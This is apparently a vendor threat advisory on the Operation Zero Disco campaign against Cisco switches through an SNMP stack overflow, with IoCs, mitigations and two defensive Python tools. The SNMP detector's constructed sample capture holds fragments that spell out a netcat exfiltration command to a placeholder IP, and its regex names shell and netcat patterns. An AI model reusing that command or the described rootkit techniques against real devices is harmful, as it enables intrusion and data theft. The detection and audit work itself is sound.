
Operation Zero Disco: Exploitation of Cisco SNMP Vulnerability for Rootkit Deployment

Cybercriminals and advanced persistent threat (APT) actors continue to evolve toward persistence-driven, stealth-centric operations that exploit both zero-day and known vulnerabilities to compromise critical infrastructure. One of the most recent and concerning examples is Operation Zero Disco, a high-impact campaign that weaponizes CVE-2025-20352, a high-severity stack overflow in the SNMP subsystem of Cisco IOS and IOS XE, to deploy fileless Linux rootkits on core switches. The flaw needs a valid SNMPv1/v2c community string or SNMPv3 user to trigger at all, and privilege-15 credentials to turn the crash into code execution, which is why exposed default community strings and weak administrative credentials are central to the campaign. The attackers have also been observed attempting a modified variant of CVE-2017-3881, a previously disclosed remote code execution flaw in Cisco's Cluster Management Protocol that is reachable over Telnet, against legacy devices. Uncovered by Trend Micro, the campaign primarily affects older Cisco switch models such as the 3750G series, which lack the exploit mitigations of newer platforms. The attackers aim to establish long-term, low-noise access, enabling espionage, lateral movement, and traffic manipulation across segmented VLANs.

Background on Operation Zero Disco

Operation Zero Disco is a sophisticated cyberattack campaign targeting Cisco switches, primarily exploiting vulnerabilities in SNMP (Simple Network Management Protocol) and Telnet services. First uncovered by Trend Micro, the campaign is notable for:
    • Targeting both 32-bit and 64-bit Cisco platforms, including legacy models like the 3750G.
    • Installing fileless rootkits that provide persistent, stealthy access.
    • Bypassing authentication and logging mechanisms, making detection extremely difficult.
    • Using a UDP-based controller to manage infected devices covertly.
The attackers appear to be highly skilled, with deep knowledge of Cisco IOS internals and in-memory data structures. The campaign is likely part of a broader espionage or disruption effort, criminal or state-sponsored; attribution has not been established.

Vulnerability Details

CVE-2025-20352
    • CVSS Score: 7.7 (High)
    • EPSS: 0.57%
    • Vulnerability Type: Stack-based buffer overflow in the SNMP subsystem. With low-privileged SNMP credentials (a read-only community string or an SNMPv3 user) it causes a denial of service; with privilege-15 credentials it yields remote code execution as root on IOS XE.
    • Affected Systems: Cisco IOS and IOS XE with SNMP enabled (32-bit and 64-bit builds). Trend Micro observed attacks on Catalyst 9400 and 9300 switches and on the legacy 3750G.
CVE-2017-3881
    • CVSS Score: 10.0 (Critical; this is the CVSS v2 base score, the v3 score is 9.8)
    • EPSS: 94.02%
    • Vulnerability Type: Remote Code Execution in the Cluster Management Protocol (CMP), triggered through the Telnet service
    • Affected Systems: Cisco IOS and IOS XE software

Impact

The impact of Operation Zero Disco is far-reaching, particularly in environments where legacy Cisco switches serve as core network infrastructure. Specific risks include:
    • Persistent Unauthorized Access: Attackers maintain long-term access through memory-resident rootkits.
    • Network Segmentation Bypass: VLAN manipulation allows threat actors to cross network boundaries.
    • Stealth Reconnaissance and Espionage: Log manipulation and in-memory execution provide near-invisible operational cover.
    • Traffic Hijacking and ARP Spoofing: Enables data interception and redirection within internal networks.
    • Security Tool Evasion: In-memory execution leaves nothing on flash for file-integrity or signature-based checks to find, and the log and configuration cloaking described below blinds the device's own telemetry.

Infection Method

1. Initial Access via SNMP Exploit

    • Attackers exploited the SNMP service using CVE-2025-20352.
    • The SNMP service was often left exposed with default “public” community strings. Because the exploit needs a valid community string to trigger, a default one satisfies that requirement and makes the device an easy entry point.
    • Malicious SNMP packets were sent to the device, each carrying a fragment of a shell command because of SNMP payload size limits.
        • Example: A captured packet contained the fragment `$(ps -a`.
        • Full commands were reconstructed from multiple packets.
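The fragment-reassembly behaviour above is what a network detection would need to reverse. The following is an added example written for this page, not Trend Micro's tooling or the attackers' code: a minimal BER decoder for SNMPv1/v2c messages that concatenates the OCTET STRING varbind values sent by each source and searches the joined stream for shell syntax such as `$(`. The sample capture is constructed; carrying the fragments as SET varbind values is an assumption, since the page only says each packet held a piece of the command.

```python
import re
from typing import Optional

# BER tags used by SNMPv1/v2c messages (RFC 1157 / RFC 3416).
TAG_INT, TAG_OCTETS, TAG_NULL, TAG_OID, TAG_SEQ = 0x02, 0x04, 0x05, 0x06, 0x30
PDU_GET, PDU_SET = 0xA0, 0xA3
SNMP_V2C = 1  # version field value for SNMPv2c

# Shell substitution / piping patterns; "$(" is the fragment the page quotes.
SHELL_RE = re.compile(rb"\$\(|`|\|\s*(?:sh|bash|nc)\b|/bin/(?:ba)?sh")
DEFAULT_COMMUNITIES = {b"public", b"private"}


def _encode_len(n: int) -> bytes:
    if n < 0x80:
        return bytes([n])
    body = n.to_bytes((n.bit_length() + 7) // 8, "big")
    return bytes([0x80 | len(body)]) + body


def tlv(tag: int, content: bytes) -> bytes:
    return bytes([tag]) + _encode_len(len(content)) + content


def encode_int(v: int) -> bytes:
    return v.to_bytes((v.bit_length() + 8) // 8, "big", signed=True)


def encode_oid(oid: str) -> bytes:
    arcs = [int(a) for a in oid.split(".")]
    out = bytearray([40 * arcs[0] + arcs[1]])
    for arc in arcs[2:]:  # base-128 with continuation bit on all but the last byte
        chunk = [arc & 0x7F]
        arc >>= 7
        while arc:
            chunk.append(0x80 | (arc & 0x7F))
            arc >>= 7
        out.extend(reversed(chunk))
    return bytes(out)


def decode_oid(data: bytes) -> str:
    arcs, val = [data[0] // 40, data[0] % 40], 0
    for b in data[1:]:
        val = (val << 7) | (b & 0x7F)
        if not b & 0x80:
            arcs.append(val)
            val = 0
    return ".".join(map(str, arcs))


def build_snmp(community: str, oid: str, value: Optional[bytes],
               request_id: int, pdu_type: int) -> bytes:
    """Build an SNMPv2c GET (value None -> NULL) or SET (OCTET STRING value)."""
    val = tlv(TAG_NULL, b"") if value is None else tlv(TAG_OCTETS, value)
    varbind = tlv(TAG_SEQ, tlv(TAG_OID, encode_oid(oid)) + val)
    pdu = tlv(pdu_type, tlv(TAG_INT, encode_int(request_id))
              + tlv(TAG_INT, encode_int(0))   # error-status
              + tlv(TAG_INT, encode_int(0))   # error-index
              + tlv(TAG_SEQ, varbind))
    return tlv(TAG_SEQ, tlv(TAG_INT, encode_int(SNMP_V2C))
               + tlv(TAG_OCTETS, community.encode()) + pdu)


def _read_tlv(buf: bytes, pos: int):
    """Read one BER TLV at buf[pos]; return (tag, content, next_pos)."""
    tag, first = buf[pos], buf[pos + 1]
    pos += 2
    if first & 0x80:  # long form: low 7 bits give the number of length bytes
        n = first & 0x7F
        length, pos = int.from_bytes(buf[pos:pos + n], "big"), pos + n
    else:
        length = first
    end = pos + length
    if end > len(buf):
        raise ValueError("truncated BER element")
    return tag, buf[pos:end], end


def parse_snmp(packet: bytes) -> dict:
    tag, body, _ = _read_tlv(packet, 0)
    if tag != TAG_SEQ:
        raise ValueError("not an SNMP message")
    _, ver, pos = _read_tlv(body, 0)
    _, community, pos = _read_tlv(body, pos)
    pdu_type, pdu, _ = _read_tlv(body, pos)
    pos = 0
    for _ in range(3):  # request-id, error-status, error-index
        _, _, pos = _read_tlv(pdu, pos)
    _, vbl, _ = _read_tlv(pdu, pos)
    varbinds, pos = [], 0
    while pos < len(vbl):
        _, vb, pos = _read_tlv(vbl, pos)
        _, oid, vpos = _read_tlv(vb, 0)
        vtag, val, _ = _read_tlv(vb, vpos)
        varbinds.append((decode_oid(oid), vtag, val))
    return {"version": int.from_bytes(ver, "big", signed=True),
            "community": community, "pdu_type": pdu_type, "varbinds": varbinds}


def analyze_capture(packets) -> dict:
    """packets: iterable of (src_ip, raw UDP payload) in capture order.
    Concatenates OCTET STRING varbind values per source, so a pattern split
    across two datagrams is still found, and notes default community strings."""
    streams = {}
    for src, raw in packets:
        msg = parse_snmp(raw)
        s = streams.setdefault(src, {"payload": b"", "weak_community": False, "sets": 0})
        s["payload"] += b"".join(v for _, t, v in msg["varbinds"] if t == TAG_OCTETS)
        s["weak_community"] = s["weak_community"] or msg["community"] in DEFAULT_COMMUNITIES
        s["sets"] += int(msg["pdu_type"] == PDU_SET)
    for s in streams.values():
        m = SHELL_RE.search(s["payload"])
        s["hit"] = m.group(0).decode("latin-1") if m else None
    return streams


# Constructed sample capture (not real Zero Disco traffic): one sysDescr poll
# from a monitoring host, then three SETs from a second source whose values
# only spell out a full shell command once concatenated.
SYS_DESCR, SYS_CONTACT = "1.3.6.1.2.1.1.1.0", "1.3.6.1.2.1.1.4.0"
SAMPLE_CAPTURE = [
    ("192.0.2.10", build_snmp("public", SYS_DESCR, None, 1001, PDU_GET)),
    ("10.0.0.5", build_snmp("public", SYS_CONTACT, b"$(ps -a", 7, PDU_SET)),
    ("10.0.0.5", build_snmp("public", SYS_CONTACT, b"ux | nc 203.0.113.9 5", 8, PDU_SET)),
    ("10.0.0.5", build_snmp("public", SYS_CONTACT, b"3)", 9, PDU_SET)),
]

if __name__ == "__main__":
    for src, info in analyze_capture(SAMPLE_CAPTURE).items():
        print(src, info)
```

Per-packet inspection alone would miss command text that straddles datagrams; grouping by source (and, in production, by community and request-id window) is what makes the quoted `$(ps -a` fragment meaningful. A second, cheaper signal is also visible here: SET requests, or any request at all, arriving with a default community string from a host that is not a known poller.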

2. Rootkit Deployment

    • On 32-bit devices (e.g., 3750G):
        • The SNMP exploit allowed remote code execution (RCE).
        • A Linux rootkit was installed to maintain persistence and evade detection.
    • On 64-bit devices (e.g., 9300/9400):
        • Required level 15 privilege to access the guest shell.
        • Once inside, the rootkit installed a universal password (containing “disco”) that works for subsequent logins through any authentication path.
        • A fileless rootkit was deployed via the guest shell.

3. Advanced Exploits

    • Logging Bypass:
        • A variant of the SNMP exploit could disable trace logging without using mmap.
        • Only a few memory addresses were needed to achieve RCE.
    • Telnet Exploit:
        • A modified version of CVE-2017-3881 was used to allow arbitrary memory read/write.
        • Full capabilities are still under investigation.

4. Post-Exploitation Control

    • A UDP-based controller was deployed to manage the rootkit.
    • The controller could:
        • Toggle or delete logs.
        • Bypass AAA authentication and VTY ACLs.
        • Enable/disable the universal password.
        • Hide configuration changes (e.g., accounts, ACLs, EEM scripts).
        • Reset configuration timestamps to hide modifications.

5. Lateral Movement

    • Attackers used ARP spoofing to impersonate trusted devices (e.g., waystations).
    • This allowed them to bypass internal firewalls and move laterally across VLANs.
    • The ARP spoofing tool was a Linux ELF binary executed via the guest shell.

Malware Capabilities

    • Universal Password Injection: Hooks low-level auth to allow access across all login methods.
    • Log Manipulation: Can disable or delete logs, making detection difficult.
    • Configuration Cloaking: Hides specific ACLs, accounts, and scripts from running-config.
    • VTY ACL Bypass: Ignores access control lists on virtual terminal lines.
    • UDP Controller: Used to manage the rootkit remotely. Because the rootkit hooks the device's packet handling rather than binding its own socket, no dedicated listening port shows up in a port scan or in the switch's own socket listing.

Tactics, Techniques & Procedures (TTPs)

Operation Zero Disco maps closely to the MITRE ATT&CK framework, exhibiting a full chain of compromise from initial access to stealthy command and control.
    • TA0001 – Initial Access: Exploitation of the SNMP vulnerability, enabled by exposed community strings.
    • TA0002 – Execution: Arbitrary code execution via the stack overflow in the SNMP subsystem.
    • TA0003 – Persistence: Fileless rootkit modifies IOSd memory and sets a universal password containing the word “disco”.
    • TA0005 – Defense Evasion: Attackers disable logging, hide configuration changes, and bypass AAA and VTY ACLs.
    • TA0008 – Lateral Movement: VLAN routing manipulation and ARP spoofing to move laterally across networks.
    • TA0011 – Command & Control: A UDP-based controller that needs no dedicated listening port.

Indicators of Compromise (IoCs)

    • Hidden Accounts: e.g., dg3y8dpk, dg4y8epk, etc.
    • Hidden ACLs: e.g., EnaQWklg0, EnaQWklg1
    • EEM Scripts: CiscoEMX-1 to CiscoEMX-5
    • Suspicious UDP Payloads: Used for rootkit control.
    • ARP Spoofing Tools: ELF binaries running in guest shell.
Because the rootkit cloaks these accounts, ACLs, and EEM applets from the running configuration on a compromised device, their absence from `show running-config` is not evidence of a clean switch. Check archived configuration backups, AAA server logs, and out-of-band NetFlow or packet captures as well.

Mitigation Steps

To defend against Operation Zero Disco, security teams should take immediate action:
    1. Patch All Affected Devices: Apply Cisco’s fix for CVE-2025-20352 without delay. Check the Cisco PSIRT advisory for fixed software releases.
    2. Restrict SNMP Access: Prefer SNMPv3 with authentication and privacy, remove default community strings such as “public” and “private”, avoid read-write communities, and bind every community or group to an ACL that permits only trusted management subnets.
    3. Segment Legacy Devices: Isolate legacy switches that can’t be patched immediately and monitor them closely for anomalies.
    4. Audit Network Configuration: Look for unexpected routing rules, ACL changes, or hidden configuration segments on core switches, comparing against configuration backups rather than trusting the live device alone.
    5. Engage Cisco TAC for Firmware Integrity Checks: Cisco TAC can assist with forensic inspection of switch memory and persistent changes.
    6. Deploy Threat Detection & Virtual Patching: Use Trend Micro Cloud One Network Security and Deep Discovery Inspector to detect SNMP anomalies and apply virtual patches.
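Steps 2 and 4 above, together with the indicator list, can be turned into a repeatable check over exported configurations. The following is an added example written for this page, not Trend Micro's or SecPod's tooling: it scans IOS/IOS XE configuration text for default or unrestricted SNMP communities and for the account, ACL, and EEM applet names the page lists, and records whether an SNMPv3 `priv` group is present. Both sample configurations are constructed. Run it over configuration backups from your management system; because the rootkit hides its objects from the running configuration, a clean result from the live device is not conclusive.

```python
import re

# Indicator names as listed on the page (from Trend Micro's Operation Zero
# Disco report). The page calls these examples, so the sets are not exhaustive.
IOC_USERNAMES = {"dg3y8dpk", "dg4y8epk"}
IOC_ACL_NAMES = {"EnaQWklg0", "EnaQWklg1"}
IOC_EEM_APPLETS = {f"CiscoEMX-{i}" for i in range(1, 6)}

DEFAULT_COMMUNITIES = {"public", "private"}

# snmp-server community <string> [view <name>] {RO|RW} [acl-number|acl-name]
COMMUNITY_RE = re.compile(
    r"^snmp-server community (\S+)(?:\s+view\s+\S+)?\s+(RO|RW)(?:\s+(\S+))?\s*$"
)
V3_PRIV_GROUP_RE = re.compile(r"^snmp-server group \S+ v3 priv\b")
USERNAME_RE = re.compile(r"^username (\S+)")
ACL_RE = re.compile(r"^ip access-list (?:standard|extended) (\S+)")
EEM_RE = re.compile(r"^event manager applet (\S+)")


def audit_config(config_text: str) -> dict:
    """Scan IOS/IOS XE configuration text for weak SNMP exposure and for the
    account/ACL/EEM names the page lists as Zero Disco indicators.

    Returns {"findings": [...], "snmpv3_priv": bool}. Findings are strings of
    the form "<category>:<detail>" so they are easy to assert on or ship to a SIEM.
    """
    findings = []
    snmpv3_priv = False
    for raw in config_text.splitlines():
        line = raw.strip()
        if not line or line.startswith("!"):
            continue  # blank lines and IOS "!" separators

        m = COMMUNITY_RE.match(line)
        if m:
            community, mode, acl = m.groups()
            # Any v1/v2c community is a shared secret sent in clear text; the
            # page's point is that "public"/"private" make the door trivial.
            if community.lower() in DEFAULT_COMMUNITIES:
                findings.append(f"weak_community:{community}")
            if mode == "RW":
                findings.append(f"rw_community:{community}")
            if acl is None:
                findings.append(f"community_without_acl:{community}")
            continue

        if V3_PRIV_GROUP_RE.match(line):
            snmpv3_priv = True
            continue

        for regex, names, category in (
            (USERNAME_RE, IOC_USERNAMES, "ioc_username"),
            (ACL_RE, IOC_ACL_NAMES, "ioc_acl"),
            (EEM_RE, IOC_EEM_APPLETS, "ioc_eem"),
        ):
            m = regex.match(line)
            if m and m.group(1) in names:
                findings.append(f"{category}:{m.group(1)}")
    return {"findings": findings, "snmpv3_priv": snmpv3_priv}


# Constructed sample: a legacy switch with default communities, no SNMP ACL,
# and the page's indicator names planted in the configuration.
WEAK_CONFIG = """\
!
hostname core-3750g
!
username admin privilege 15 secret 9 REDACTED
username dg3y8dpk privilege 15 secret 9 REDACTED
!
ip access-list extended EnaQWklg0
 permit ip any any
!
snmp-server community public RO
snmp-server community private RW
!
event manager applet CiscoEMX-1
 event none
 action 1.0 syslog msg "x"
!
"""

# Constructed sample: no v1/v2c communities at all, SNMPv3 with auth+priv,
# and the group bound to an ACL that only admits the management subnet.
HARDENED_CONFIG = """\
!
hostname core-3750g
!
username admin privilege 15 secret 9 REDACTED
!
ip access-list standard SNMP-MGMT
 permit 10.10.0.0 0.0.0.255
 deny   any log
!
snmp-server view MGMT-VIEW iso included
snmp-server group SNMP-RO v3 priv read MGMT-VIEW access SNMP-MGMT
!
"""

if __name__ == "__main__":
    for name, cfg in (("weak", WEAK_CONFIG), ("hardened", HARDENED_CONFIG)):
        print(name, audit_config(cfg))
```

The hardened sample is the shape step 2 asks for: no community strings, an SNMPv3 group with `priv`, and an `access` ACL on the group. Adding an ACL to a v2c community (`snmp-server community <name> RO <acl>`) closes the "unrestricted" finding but still leaves a clear-text shared secret, so the check reports it separately from the default-string finding.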

Instantly Fix Risks with Saner Patch Management

Saner patch management is a continuous, automated, and integrated software that instantly fixes risks exploited in the wild. The software supports major operating systems like Windows, Linux, and macOS, as well as 550+ third-party applications. It also allows you to set up a safe testing area to test patches before deploying them in a primary production environment. Saner patch management additionally supports a patch rollback feature in case of patch failure or a system malfunction. Experience the fastest and most accurate patching software here.